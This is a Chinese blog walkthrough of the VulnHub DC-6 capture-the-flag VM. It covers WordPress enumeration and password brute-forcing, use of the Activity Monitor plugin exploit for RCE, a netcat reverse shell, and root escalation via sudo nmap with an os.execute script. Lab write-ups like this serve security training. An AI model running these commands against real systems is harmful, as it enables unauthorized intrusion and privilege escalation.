看完这篇 教你玩转渗透测试靶机vulnhub——DC6

简介: 看完这篇 教你玩转渗透测试靶机vulnhub——DC6

@TOC

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

靶机DC6,,,只有拿到root权限才可以发现最终的flag。

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/dc/DC-6.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.20

使用命令: nmap -sS -sV -A -n 172.16.5.20

在这里插入图片描述
通过nmap扫描我们我发现靶机开放了22.80端口 直接访问80 但是好像没反应 因为之前我们遇到过这种情况 需要改hosts文件

vim /etc/hosts 打开hosts配置文件,然后重启一下服务 然后就可以正常访问了。
在这里插入图片描述
(PS:我改了hosts 但是还是访问不了,最后发现是我代理没关,真的是菜的扣脚,呜呜呜~)
在这里插入图片描述
这个界面很熟悉呀,和DC-2一样 估计又是wordpress 使用工具扫一下就知道啦
使用命令:wpscan wordy -edirb 172.16.5.20 发现了wp-cron.php/upload 还有一些用户
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
访问发现并没有什么可以利用的。然后直接访问一下后台,现在只知道账号 不知道密码 所以需要暴力破解。

http://wordy/wp-login.php  #访问后台

在这里插入图片描述
然后把五个用户 生成了一个字典 然后又用了之前DC-2 的密码字典 然后用wpscan 爆破了一下发现不行!!!
在这里插入图片描述
这个时候我们想到了作者给的提示
在这里插入图片描述
在这里插入图片描述

cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic   #生成字典
cat wordy-pass1.dic  #查看字典

②:暴力破解:

使用命令:wpscan --url wordy -U wordy-user -P wordy-pass1.dic 密码为:helpdesk01 登入网页,登入成功!!!!
在这里插入图片描述
在这里插入图片描述

③:漏洞发现:

经过大概的阅览知道了权限并不高,而且发现了Activity monitor这个插件(因为也是第一次做,大概知道了是远程命令执行漏洞)

searchsploit activity monitor  #搜索相关信息

在这里插入图片描述
现在我们知道了exp 相关信息了 就要进行利用了

④:漏洞利用:

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html  #复制到桌面
vim 45274.html #进行编辑

在这里插入图片描述
使用python开启个临时服务:python -m SimpleHTTPServer 80
在这里插入图片描述
使用kali监听一下 nc -nlvp 172.16.5.42 9999
在这里插入图片描述
(PS:这里我卡了很久,原因是因为设置的时候需要把里面的nc -nlvp 参数去掉 不然运行了也回弹不了shell 还是自己不够仔细,怪自己太菜了,希望大家可以少走弯路~ )

设置交互:python -c "import pty;pty.spawn('/bin/bash')"
在这里插入图片描述

⑤:nmap脚本提权:

/home/mark/stuff下发现一个文件,记录了用户graham的密码GSo7isUM1D4
在这里插入图片描述
切换graham用户 使用命令sudo -l 发现可以直接执行backups.shbackups.sh文件写入/bin/bash,然后以jens执行该脚本

执行后切换为jens用户执行成功发现有nmap脚本可以执行。
在这里插入图片描述
在这里插入图片描述
进入/tmp下面 nmap--script 参数可以执行脚本

echo 'os.execute("/bin/bash")'>getroot.sh
sudo nmap --script=getroot.sh

在这里插入图片描述

⑥:获取flag:

在这里插入图片描述
至此看到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

**这是做的第七个靶场了,学习的知识点和一些细节就是 :
1.要学会多看作者提供的靶机信息 (字典)
2.这次还是老样子 又有新的错误,做好好久 在利用漏洞的时候需要把nc 里面的参数去掉 ,不然不会反弹shell(希望你们可以少走弯路)**

**新知识点:
①:学会了pyhon开启临时服务:python -m SimpleHTTPServer 80
②:学会了nmap 脚本执行提权
③:学习了Activity monitor插件的远程执行漏洞的利用**
最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!

相关文章
|
1月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
56 0
|
安全 搜索推荐 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
435 0
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
|
1月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
26 0
|
1月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
83 0
|
8月前
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone
看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone
82 0
|
8月前
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
62 0
|
8月前
|
存储 网络协议 Shell
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
52 0
VulnHub靶机DC2渗透测试笔记
|
8月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
197 0
|
8月前
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:2
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:2
77 0
|
8月前
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
98 0

热门文章

最新文章